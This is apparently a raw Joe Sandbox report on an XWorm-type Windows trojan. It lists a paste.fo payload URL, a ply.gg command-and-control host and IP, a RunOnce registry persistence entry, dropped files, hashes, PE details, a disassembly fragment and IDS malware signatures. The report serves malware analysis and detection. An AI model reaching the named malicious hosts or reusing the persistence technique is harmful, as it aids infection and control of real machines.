            https://paste.fo/raw/9c15a0ff5499G0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499#=0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499IUr0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499D0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499XN&b0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499t(X?0%Avira URL Cloudsafe
            https://paste.fo/0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499=)0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff54990%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff5499#=0%VirustotalBrowse
            https://paste.fo/jH0%Avira URL Cloudsafe
            https://paste.fo/raw/9c15a0ff54990%VirustotalBrowse
            https://paste.fo/0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            cameras-commitment.gl.at.ply.gg
            147.185.221.16
            truetrue
              unknown
              paste.fo
              104.21.28.76
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              cameras-commitment.gl.at.ply.ggtrue
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499false
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://paste.fo/raw/9c15a0ff5499GFRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499j~SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718040937.0000025E70A62000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718458434.0000025E70A6D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2bSecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, FRpl.exe.0.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499eFRpl.exe, 00000003.00000002.1864510706.000002806A78F000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499#=FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499DFRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499IUrFRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499XN&bFRpl.exe, 00000003.00000002.1864510706.000002806A7A9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499t(X?FRpl.exe, 00000009.00000002.1943889827.00000282C5026000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsinfo32.exe, 00000002.00000002.4156949853.000001AA12B31000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://paste.fo/raw/9c15a0ff5499=)SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://paste.fo/jHSecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              147.185.221.16
              cameras-commitment.gl.at.ply.ggUnited States
              12087SALSGIVERUStrue
              104.21.28.76
              paste.foUnited States
              13335CLOUDFLARENETUSfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1489770
              Start date and time:2024-08-08 02:35:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 29s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@12/3@2/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 116
              • Number of non-executed functions: 95
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              01:36:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4 C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
              01:36:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 9Q9QTPMV20RVO8c4 C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
              20:36:04API Interceptor16288750x Sleep call for process: msinfo32.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              147.185.221.16Build.exeGet hashmaliciousRedLineBrowse
              • medical-m.gl.at.ply.gg:6677/IRemotePanel
              4JL966sxM4.exeGet hashmaliciousRedLineBrowse
              • jul-nelson.gl.at.ply.gg:47198/
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              paste.foconfirmationcr.vbsGet hashmaliciousRedline ClipperBrowse
              • 104.21.70.240
              9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
              • 104.21.70.240
              9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
              • 104.21.70.240
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              SALSGIVERUS185.196.11.135-x86-2024-08-06T18_49_53.elfGet hashmaliciousMiraiBrowse
              • 147.176.119.167
              cougif6lqM.exeGet hashmaliciousDCRat, XWormBrowse
              • 147.185.221.17
              killer.exeGet hashmaliciousXWormBrowse
              • 147.185.221.18
              setup.exeGet hashmaliciousXWormBrowse
              • 147.185.221.21
              msedge.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
              • 147.185.221.20
              z5F3uLmKBu.exeGet hashmaliciousXWormBrowse
              • 147.185.221.20
              PMRpXCwamC.exeGet hashmaliciousAsyncRAT, XWormBrowse
              • 147.185.221.21
              dH3bcNSEKG.exeGet hashmaliciousXWormBrowse
              • 147.185.221.20
              Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
              • 147.185.221.21
              FUDE.bin.exeGet hashmaliciousXWormBrowse
              • 147.185.221.17
              CLOUDFLARENETUShttp://guqtg.frooskivpn.com/4guusj15181vCAj1127elpjnhawbx14030EJAOJSTOQCIWNIN24527KYKP17651B16#l8054dcdz5aasx7h9lz4sls75gk825optascqsrhl95ahyhhm7Get hashmaliciousPhisherBrowse
              • 104.17.25.14
              https://1drv.ms/w/c/b1ff01bed9ea475d/IQProY0kjoYVQLqU9_kinT4XAa3BpLyE-M2L1U96jcTVk_cGet hashmaliciousHTMLPhisherBrowse
              • 104.18.11.207
              https://dowld-sso--l-edger.webflow.io/Get hashmaliciousUnknownBrowse
              • 104.18.28.127
              https://pancakeswap-proclaim.us/Get hashmaliciousUnknownBrowse
              • 104.17.25.14
              http://cloudflare-ipfs.com/ipfs/bafkreifpoyvrphoiovn7hewptqfnvnciosy5ynzqpghzcad46hweedcphaGet hashmaliciousHTMLPhisherBrowse
              • 104.18.11.207
              http://rewwerds-ff-garena.ru/Get hashmaliciousUnknownBrowse
              • 172.67.223.250
              https://ipfs.io/ipfs/bafkreifpoyvrphoiovn7hewptqfnvnciosy5ynzqpghzcad46hweedcphaGet hashmaliciousHTMLPhisherBrowse
              • 104.18.30.43
              http://cloudflare-ipfs.com/ipfs/bafkreigdmr3dab6hifnupc5d7wrdkfq7d2gjgmuhewowmlyufosov6ufgeGet hashmaliciousHTMLPhisherBrowse
              • 104.17.64.14
              https://ipfs.io/ipfs/bafkreigdmr3dab6hifnupc5d7wrdkfq7d2gjgmuhewowmlyufosov6ufgeGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
              • 104.18.11.207
              http://rewwerds-ff-garena.ru/freefire/Get hashmaliciousUnknownBrowse
              • 172.67.223.250
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19mgfo.dllGet hashmaliciousUnknownBrowse
              • 104.21.28.76
              mgfo.dllGet hashmaliciousUnknownBrowse
              • 104.21.28.76
              3d#U044f.lnkGet hashmaliciousUnknownBrowse
              • 104.21.28.76
              lt0Bl5kc0e.exeGet hashmaliciousGuLoaderBrowse
              • 104.21.28.76
              MicrosoftEdgeUpdateTaskMachineCUA.VBS.vbsGet hashmaliciousUnknownBrowse
              • 104.21.28.76
              FySc2FzpA8.exeGet hashmaliciousGo InjectorBrowse
              • 104.21.28.76
              FE89Nae47k.exeGet hashmaliciousVidarBrowse
              • 104.21.28.76
              7zip_installer_d162802.exeGet hashmaliciousUnknownBrowse
              • 104.21.28.76
              Setup_20.1_win64.exeGet hashmaliciousVidarBrowse
              • 104.21.28.76
              BrowserUpdater.lnkGet hashmaliciousUnknownBrowse
              • 104.21.28.76
              No context
              Process:C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):654
              Entropy (8bit):5.380476433908377
              Encrypted:false
              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
              Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):354816
              Entropy (8bit):6.367150840935163
              Encrypted:false
              SSDEEP:6144:/GNiI1KTTWXe8D1LYWoNxQOlEJESR0HN98er80du7gZPqhHsETDdtlz42AVFAnS:/GNUuXnDNbIxQWMExt+ei7g9qW+J/eV2
              MD5:FF0BADEB5D6675C36D8F9068A1232258
              SHA1:7D287AD2BCDCE85532DEA445371A2D3C8295E516
              SHA-256:5B64CB5B788CCDD6006A7EDEFE6DCD1D36C9BF09101B53398E6A5938A1CC29C8
              SHA-512:DE4A382BF267C27279727F03A898B817E4B4058907FBAE384C4368CFE35BB0B8184CA8678DE3A426BDCE0D4D62027CC3A634FF0BE48549C0A32F9BEDE9365664
              Malicious:true
              Antivirus:
              • Antivirus: Virustotal, Detection: 25%, Browse
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............".8...f................@......................................`....`... ..............................................................0..................................................(.......................p............................text...H6.......8..................`.P`.data... ....P.......<..............@.P..rdata.......`.......>..............@.`@.pdata.......0......................@.0@.xdata...2...P...2..................@.0@.bss.... .............................`..idata...............N..............@.0..CRT....p............`..............@.@..tls.................b..............@.@..reloc...............d..............@.0B................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview:[ZoneTransfer]....ZoneId=0
              File type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
              Entropy (8bit):6.367150840935163
              TrID:
              • Win64 Executable (generic) (12005/4) 74.95%
              • Generic Win/DOS Executable (2004/3) 12.51%
              • DOS Executable Generic (2002/1) 12.50%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
              File name:SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
              File size:354'816 bytes
              MD5:ff0badeb5d6675c36d8f9068a1232258
              SHA1:7d287ad2bcdce85532dea445371a2d3c8295e516
              SHA256:5b64cb5b788ccdd6006a7edefe6dcd1d36c9bf09101b53398e6a5938a1cc29c8
              SHA512:de4a382bf267c27279727f03a898b817e4b4058907fbae384c4368cfe35bb0b8184ca8678de3a426bdce0d4d62027cc3a634ff0be48549c0a32f9bede9365664
              SSDEEP:6144:/GNiI1KTTWXe8D1LYWoNxQOlEJESR0HN98er80du7gZPqhHsETDdtlz42AVFAnS:/GNUuXnDNbIxQWMExt+ei7g9qW+J/eV2
              TLSH:86747C17F6E1A9BCE16AC07483569673BA37B88D0220397F53D486343E66E202F5DF19
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............".8...f................@......................................`....`... ............................
              Icon Hash:90cececece8e8eb0
              Entrypoint:0x4014f0
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows cui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x66B394B1 [Wed Aug 7 15:37:21 2024 UTC]
              TLS Callbacks:0x41ca20
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:827e46eec0f766fadcee4c8501e1de53
              Instruction
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [00050B35h]
              mov dword ptr [eax], 00000000h
              call 00007FFAF466A54Fh
              call 00007FFAF462899Ah
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop word ptr [eax+eax+00000000h]
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              call 00007FFAF466A3CCh
              dec eax
              test eax, eax
              sete al
              movzx eax, al
              neg eax
              dec eax
              add esp, 28h
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              lea ecx, dword ptr [00000009h]
              jmp 00007FFAF4628CF9h
              nop dword ptr [eax+00h]
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              inc ecx
              push edi
              inc ecx
              push esi
              inc ecx
              push ebp
              inc ecx
              push esp
              push esi
              push edi
              push ebp
              push ebx
              dec eax
              sub esp, 000000F8h
              inc esp
              mov byte ptr [esp+4Fh], cl
              dec esp
              mov dword ptr [esp+50h], eax
              dec ecx
              mov esi, edx
              dec eax
              mov edi, ecx
              dec ecx
              mov esp, 00000000h
              add byte ptr [eax], al
              add byte ptr [eax-6F6672B8h], al
              add dword ptr [eax], eax
              add byte ptr [ebp+ecx*4-57h], cl
              cwde
              add dword ptr [eax], eax
              add byte ptr [eax-73h], cl
              insb
              and al, 70h
              dec esp
              lea edi, dword ptr [ecx+00000168h]
              dec eax
              lea eax, dword ptr [ecx+30h]
              dec eax
              mov dword ptr [esp+000000A0h], eax
              dec eax
              lea eax, dword ptr [ecx+58h]
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0000x10a8.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x530000x1adc.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000x4c4.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x51c000x28.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x5a4100x370.idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x436480x438003d10269cfb91c9b23c32fb5d687fb443False0.5322771990740741data6.351920157698596IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x450000x1200x2003b43ab94eff15a1e16f6e89933e63877False0.142578125data0.7505333305125921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0x460000xc0800xc20001694037a9e9bcac5939ab5ff90c4206False0.40757893041237114data5.586527256303149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .pdata0x530000x1adc0x1c006e204c08cda11f782adfde8ff82ec133False0.4877232142857143data5.446254059490632IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .xdata0x550000x32000x3200562233c964b6e7288bd9b42a08383387False0.3765625data5.468108910686631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .bss0x590000xa200x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0x5a0000x10a80x1200c4f18e333c49f18f8c1daa24275320caFalse0.3207465277777778data4.315940831752453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .CRT0x5c0000x700x20051d2a3d3e0eeb5fc057196d73692bf6aFalse0.083984375data0.3281187745953951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0x5d0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .reloc0x5e0000x4c40x600eafe9c2ec4b39419542aeea47f3ea9daFalse0.560546875data4.796357731350743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              DLLImport
              KERNEL32.dllAddVectoredExceptionHandler, CloseHandle, CopyFileExW, CreateDirectoryW, CreateFileMappingA, CreateFileW, CreateToolhelp32Snapshot, DuplicateHandle, FindClose, FindFirstFileW, FormatMessageW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, GetEnvironmentVariableW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFullPathNameW, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, HeapAlloc, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, MapViewOfFile, Module32FirstW, Module32NextW, MultiByteToWideChar, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetFileInformationByHandle, SetLastError, SetThreadStackGuarantee, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnmapViewOfFile, WaitForSingleObject, WriteConsoleW
              api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
              ADVAPI32.dllSystemFunction036
              bcrypt.dllBCryptGenRandom
              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, RaiseException, RtlAddFunctionTable, RtlUnwindEx, TerminateProcess, UnhandledExceptionFilter, VirtualProtect, VirtualQuery, __C_specific_handler
              msvcrt.dll__getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _fpreset, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcmp, memcpy, memmove, memset, signal, strlen, strncmp, vfprintf
              ntdll.dllNtWriteFile, RtlNtStatusToDosError
              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
              2024-08-08T02:38:40.864390+0200TCP2853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound14974620343192.168.2.4147.185.221.16
              2024-08-08T02:36:24.326130+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249739443192.168.2.4104.21.28.76
              2024-08-08T02:36:16.355177+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249732443192.168.2.4104.21.28.76
